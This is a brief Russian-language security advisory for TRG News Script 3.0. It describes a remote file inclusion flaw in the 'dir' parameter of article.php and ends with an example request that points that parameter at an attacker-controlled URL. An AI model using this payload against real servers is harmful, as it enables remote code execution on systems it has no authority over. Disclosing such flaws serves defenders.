Программа: TRG News Script 3.0
Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на уязвимой системе с привилегиями
web сервера. Уязвимость существует из-за
некорректной обработки входных данных в
переменной dir. Удаленный пользователь может
изменить значение этой переменной на
произвольный URL и выполнить одноименные
сценарии на сервере. Для успешной
эксплуатации уязвимости 'register_globals' и 'allow_url_fopen'
должны быть включены в конфигурационном
файле php на целевом сервере.
Пример:
http://[target]/research/news/trg_news30 /trgnews/install/article.php?dir=http://[attacker]
